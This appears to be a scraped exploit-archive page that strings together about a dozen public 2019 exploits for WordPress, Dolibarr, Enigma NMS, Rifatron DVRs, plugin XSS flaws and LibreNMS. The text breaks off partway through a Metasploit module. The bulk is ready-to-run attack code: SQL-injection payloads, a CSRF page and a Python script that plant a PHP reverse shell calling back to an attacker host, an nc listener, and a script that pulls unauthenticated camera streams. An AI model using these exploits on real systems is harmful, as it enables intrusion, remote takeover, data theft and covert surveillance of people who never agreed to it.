ISHACK AI BOT

#!/usr/bin/perl -w # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # Type: Remote # Risk: High # # Solution: # Set security headers to web server and no-cache for Cache-Control # # Simple Attack Scenarios: # # o This attack can bypass Simple WAF to access restricted content on the web server, # something like phpMyAdmin; # # o This attack can deface the vulnerable Wordpress website with content from the default vhost; # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # ==================================================================================== # # Author: Todor Donev 2019 (c) <todor.donev at gmail.com> # # > Host => default-vhost.com # # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) # # > Content-Type => application/x-www-form-urlencoded # # < Connection => close # # < Date => Fri, 06 Sep 2019 11:39:43 GMT # # < Location => https://default-vhost.com/ # # < Server => nginx # # < Content-Type => text/html; charset=UTF-8 # # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT # # < Client-Peer => 13.37.13.37:443 # # < Client-Response-Num => 1 # # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3 # # < Client-SSL-Cert-Subject => /CN=default-vhost.com # # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384 # # < Client-SSL-Socket-Class => IO::Socket::SSL # # < Client-SSL-Warning => Peer certificate not verified # # < Client-Transfer-Encoding => chunked # # < Strict-Transport-Security => max-age=31536000; # # < X-Powered-By => PHP/7.3.9 # # < X-Redirect-By => WordPress # # ==================================================================================== # # # use strict; use v5.10; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; my $host = shift || ''; my $attacker = shift || 'default-vhost.com'; say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # ==================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>"; if ($host !~ m/^http/){ say "# e.g. perl $0 https://target:port/ default-vhost.com"; exit; } my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } ); $browser->timeout(10); $browser->agent($user_agent); my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " "); $request->header("Host" => $attacker); my $response = $browser->request($request); say "# 401 Unauthorized!\n" and exit if ($response->code eq '401'); say "# > $_ => ", $request->header($_) for $request->header_field_names; say "# < $_ => ", $response->header($_) for $response->header_field_names; say "# ====================================================================================";

# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== elemid (POST) - Sql injection PoC POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php Content-Type: application/x-www-form-urlencoded Content-Length: 143 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi] Parameter: elemid (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT (ELT(7549=7549,1))),0x7176787a71)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)

#--------------------------------------------------------------------# # Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16068 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma CSRF by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application. <html> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495"); xhr.withCredentials = true; var body = "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "system_upgrade\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action_aux\"\r\n" + "\r\n" + "upload_file_complete\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php\n" + "\n" + "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + "\n" + "?\x3e\n" + "\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + "\r\n" + "evil.php\r\n" + "-----------------------------208051173310446317141640314495--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser'; </script> <body onload="submitRequest();" > </body> </html>

#!/usr/bin/python #--------------------------------------------------------------------# # Exploit Title: Enigma NMS OS Command Injection # # NETSAS Pty Ltd Enigma NMS # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16072 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading os.system('clear') print("""\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus """) enigma_host = raw_input("Enter Enigma NMS IP address:\t") attack_host = raw_input("Enter Attacker IP address:\t") rev_sh_port = raw_input("Enter reverse shell port:\t") web_svr_port = raw_input("Enter web server port:\t\t") user = raw_input("Enter Username:\t\t\t") os.system("stty -echo") password = raw_input("Enter Password (no echo):\t") os.system("stty echo") enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1" enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"} print "\n\n[+] Building PHP reverse shell" f=open("evil.php","w") f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n") f.close() # Create simple webserver hosting evil php file print "[+] Hosting PHP reverse shell" web_svr_port = str(web_svr_port) web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid) # Create netcat listener print "[+] Creating listener on port " + rev_sh_port subprocess.Popen(["nc", "-nvlp", rev_sh_port]) # Send payload to Enigma NMS print "[+] Sending payload\n" try: r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password)) except: pass print "\n[+] Cleaning up mess..." # Shut down http server os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)

#--------------------------------------------------------------------# # Exploit Title: Enigma NMS search_pattern SQL Injection # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16065 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma SQLi by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern= Vulnerable Parameter: search_pattern (GET) Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='

# Exploit Title: Online Appointment SQL Injection # Data: 07.09.2019 # Exploit Author: mohammad zaheri # Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System # Tested on: Windows # Google Dork: N/A ========= Vulnerable Page: ========= Online-Appointment-Booking-System-master/signup.php ========== Vulnerable Source: ========== Line 52: $name=$_POST['fname']; Line 53: $gender=$_POST['gender']; Line 54: $dob=$_POST['dob']; Line 55: $contact=$_POST['contact']; Line 56: $email=$_POST['email']; Line 57: $username=$_POST['username']; Line 58: $password=$_POST['pwd']; Line 59: $prepeat=$_POST['pwdr']; Line 62: if (mysqli_query($conn, $sql)) ========= POC: ========= http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL] ========= Contact Me : ========= Telegram : @m_zhrii Email : [email protected]

#!/bin/bash # # # Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure # # # Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd. # Product web page: http://www.rifatron.com # Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504) # 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2) # Firmware: <=8.0 (000143) # # # Summary: Rifatron with its roots in Seoul, Korea has been supplying and # servicing the security market as a leading CCTV/video surveillance security # system manufacturer, specializing in stand-alone digital video recorder since # 1998. We are known for marking the first standalone DVR with audio detection # and 480 frames per secone(fps) and have been focusing on highend products and # large projects in a variety applications and merket. These include government # and public services, banking and finance, hotels and entertatinment, retail # education, industrial and commercial sectors throughout Europe, Middle East, # the U.S. and Asia. Based on the accumulated know-how in the security industry, # Rifatron is trying its utmost for the technology development and customer # satisfaction to be the best security solution company in the world. # # Desc: The DVR suffers from an unauthenticated and unauthorized live stream # disclosure when animate.cgi script is called through Mobile Web Viewer module. # # Tested on: Embedded Linux # Boa/0.94.14rc21 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5532 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php # # # 03.09.2019 # #{PoC} # set -euo pipefail IFS=$'\n\t' if [ "$#" -ne 2 ]; then echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15 echo "Ex.: $0 10.9.8.7:65432 10" exit fi IP=$1 CHANNEL=$2 HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL" STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}') if [ "$STATUS" == "404" ]; then echo "Target not vulnerable!" exit fi echo "Collecting snapshots..." for x in {1..10}; do echo -ne $x curl "$HOST" -o sequence-$x.jpg -#; sleep 0.6 done echo -ne "\nDone." echo -ne "\nRendering video..." ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4 echo " done." echo -ne "\nRunning animation..." sleep 1 cvlc video.mp4 --verbose -1 -f vlc://quit # #{/PoC}

# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting # Exploit Author: Mr Winst0n # Author E-mail: [email protected] # Discovery Date: September 09,2019 # Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads # Software Link : https://wordpress.org/plugins/sell-downloads/ # Tested Version: 1.0.86 # Tested on: Parrot OS, Wordpress 5.1.1 # PoC: 1- Go to "Products for Sale" section 2- Click on "Add New" 3- In opend window click on "Add Comment" 4- Fill comment as "/><img src=x onerror="alert()"> or "/><input type="text" onclick="alert()"> 5- Click on "Publish" (or "Update" if you editing an existing product) 6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up.

# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== actioncode (POST) - Sql injection PoC http request: POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774 Content-Type: application/x-www-form-urlencoded Content-Length: 610 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save Parameter: actioncode (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE 0x28 END))-- HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT (ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)-- jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save . . . . . demand_reason_id, availability_id (POST) - Sql injection PoC http request: POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals Content-Type: application/x-www-form-urlencoded Content-Length: 471 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty Parameter: demand_reason_id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28 END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT (ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty . . Parameter: availability_id (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28 END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT (ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 AND (SELECT 9904 FROM (SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection # inurl:"\wp-content\plugins\photo-gallery" # Date: 09-10-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: https://10web.io/ # Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip # Version: Up to v1.5.34 # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap # CVE : 2019-16119 # Software description: Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. # Technical Details & Impact: Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from them. # POC In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection. Following is the POC, 1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc& 2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc& # Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released (1.5.35) 09-10-2019 - Full Disclosure # References: https://wordpress.org/plugins/photo-gallery/#developers https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119

# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting # inurl:"\wp-content\plugins\photo-gallery" # Date: 09-10-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: https://10web.io/ # Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip # Version: Up to v1.5.34 # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows # CVE : 2019-16117 # Software description: Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. # Technical Details & Impact: XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. # POC 1. In Add Gallery/Images tab 2. Edit current image gallery 3. In Alt/Title or Description text area add XSS payload e.g; <script>alert(1);</script> 4. Click Save and preview. 5. It will show pop-up confirming existence of XSS vulnerability # Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released (1.5.35) 09-10-2019 - Full Disclosure # References: https://wordpress.org/plugins/photo-gallery/#developers https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117

# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting # inurl:"\wp-content\plugins\photo-gallery" # Date: 09-10-2019 # Exploit Author: MTK (http://mtk911.cf/) # Vendor Homepage: https://10web.io/ # Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip # Version: Up to v1.5.34 # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows # CVE : 2019-16118 # Software description: Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. # Technical Details & Impact: XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. # POC 1. Go to options tab select watermark tab 2. Select text as watermark type 3. Add watermark text as XSS payload e.g; "'><img src=a onerror='alert(2);' 4. Click Save. 5. It will show pop-up confirming existence of XSS vulnerability # Timeline 09-01-2019 - Vulnerability Reported 09-03-2019 - Vendor responded 09-04-2019 - New version released (1.5.35) 09-10-2019 - Full Disclosure # References: https://wordpress.org/plugins/photo-gallery/#developers https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Options.php?old=2142624&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FOptions.php https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/js/bwg.js?old=2135029&old_path=photo-gallery%2Ftrunk%2Fjs%2Fbwg.js https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'LibreNMS Collectd Command Injection', 'Description' => %q( This module exploits a command injection vulnerability in the Collectd graphing functionality in LibreNMS. The `to` and `from` parameters used to define the range for a graph are sanitized using the `mysqli_escape_real_string()` function, which permits backticks. These parameters are used as part of a shell command that gets executed via the `passthru()` function, which can result in code execution. ), 'License' => MSF_LICENSE, 'Author' => [ 'Eldar Marcussen', # Vulnerability discovery 'Shelby Pace' # Metasploit module ], 'References' => [ [ 'CVE', '2019-10669' ], [ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Linux', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' } } ] ], 'DisclosureDate' => '2019-07-15', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ 